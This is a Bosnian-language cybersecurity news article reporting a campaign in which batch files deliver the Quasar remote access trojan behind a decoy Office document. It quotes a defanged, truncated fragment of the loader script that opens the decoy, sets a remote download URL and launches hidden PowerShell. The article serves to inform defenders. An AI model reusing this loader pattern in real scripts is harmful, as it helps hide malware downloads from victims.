More

    Hakeri koriste BAT fajlove kao oružje za isporuku Quasar RAT-a

    By Đorđe
    Novosti

    Istraživači sajber bezbjednosti identifikovali su sofisticiranu novu kampanju u kojoj prijetnje koriste Windows batch fajlove za isporuku poznatog Quasar Remote Access Trojana (RAT).

    Ovaj vektor napada predstavlja zabrinjavajuću evoluciju taktika distribucije malvera, jer napadači stalno usavršavaju svoje metode kako bi izbjegli tradicionalne sigurnosne mjere i uspostavili trajni pristup sistemima žrtava.

    Kampanja koristi višestepeni lanac napada koji počinje naizgled bezazlenim batch fajlovima, koji služe kao početni vektor infekcije.

    Ovi fajlovi su dizajnirani da izgledaju legitimno, dok tajno orkestriraju preuzimanje i izvršavanje malicioznih programa.

    Napadači su pokazali značajnu tehničku sofisticiranost primjenom različitih tehnika zamagljivanja (obfuscation) i mjera protiv analize kako bi izbjegli otkrivanje sigurnosnim alatima i u sandbox okruženjima.

    Analitičari sa Internet Storm Centra su primijetili da je ova specifična varijanta Quasar RAT-a opremljena unaprijeđenim mogućnostima za izbjegavanje detekcije, što znatno otežava posao stručnjacima za sajber bezbjednost u njenom otkrivanju i analizi.

    Kampanja malvera aktivno cilja organizacije iz više sektora, a istraživači su primijetili značajan porast pokušaja infekcije u posljednjih nekoliko sedmica.

    Metodologija napada uključuje korišćenje lažnog Office dokumenta koji održava privid legitimnosti dok se maliciozni procesi izvršavaju u pozadini.

    Ova komponenta socijalnog inženjeringa ključna je za uspjeh kampanje, jer daje žrtvama lažan osjećaj sigurnosti dok lanac infekcije napreduje neprimijećeno.

    Mehanizam infekcije i isporuka malvera

    Početni vektor infekcije koristi pažljivo kreiran batch fajl koji implementira dvostepeni proces izvršavanja.

    Primarna skript pokreće i lažni dokument i inicira preuzimanje dodatnih malicioznih komponenti sa udaljenih servera.

    PNG slika koja sadrži payload (Izvor – Internet Storm Center)

    Struktura koda pokazuje da su napadači obraćali pažnju na operativnu sigurnost:

    perlCopyEdit@echo off
set "DOCX_PATH=%dp0Game_Purchase_Agreement (1).docx"
set "BAT_URL=hxxps://store3[.]gofile[.]io/download/web/60e1
set "STUB_BAT=%dp0stub.bat"
start "" "%DOCX_PATH%"
powershell -noprofile -windowstyle hidden -command "Invoke-
start /B "%STUB_BAT%"

    Sekundarni batch fajl koristi sofisticirane tehnike zamagljivanja, uključujući upotrebu sistemskih varijabli i naredbi goto za dinamičko rekonstruisanje malicioznog koda.

    Izvor: CyberSecurityNews

    Recent Articles

    spot_img

    Related Stories

    Novosti

    Cloudflare upozorava na DDoS napade usmjerene na novinare i novinske organizacije

    Novosti

    Hakeri iskorištavaju istekle Discord pozivne linkove za isporuku maliciozne prijetnje

    Novosti

    Procurjeli podaci s LockBit panela otkrivaju da su kineske organizacije među najčešćim metama

    Novosti

    Istraživači upozoravaju na aktivnu kampanju preuzimanja Entra ID naloga

    Novosti

    Porast sajber napada na novinare

    Novosti

    Hirundo prikupio 8 miliona dolara kako bi eliminisao loše ponašanje vještačke inteligencije

    © Copyright - Kiber.ba